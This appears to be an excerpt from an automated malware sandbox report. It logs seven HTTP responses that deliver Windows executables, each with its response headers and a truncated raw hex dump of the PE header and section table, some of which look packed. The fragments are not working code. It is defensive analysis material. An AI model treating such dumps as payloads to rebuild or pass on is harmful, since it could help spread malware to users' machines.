Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 06:38:08 GMTContent-Type: application/octet-streamContent-Length: 2963456Last-Modified: Thu, 24 Oct 2024 05:53:58 GMTConnection: keep-aliveETag: "6719e0f6-2d3800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 c0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 30 00 00 04 00 00 78 fd 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 72 72 6f 6e 73 79 71 00 b0 2a 00 00 00 06 00 00 a2 2a 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 76 79 68 6d 74 77 67 00 10 00 00 00 b0 30 00 00 04 00 00 00 12 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 30 00 00 22 00 00 00 16 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 06:38:18 GMTContent-Type: application/octet-streamContent-Length: 1837568Last-Modified: Thu, 24 Oct 2024 05:54:04 GMTConnection: keep-aliveETag: "6719e0fc-1c0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 d0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 6a 00 00 04 00 00 61 02 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 70 71 67 73 79 67 62 00 b0 19 00 00 10 50 00 00 a8 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 71 72 63 72 78 79 6d 00 10 00 00 00 c0 69 00 00 04 00 00 00 e4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 69 00 00 22 00 00 00 e8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 06:38:27 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 24 Oct 2024 05:29:33 GMTConnection: keep-aliveETag: "6719db3d-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 35 db 19 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 35 1e 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:30 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 06:38:35 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:41 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:43 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
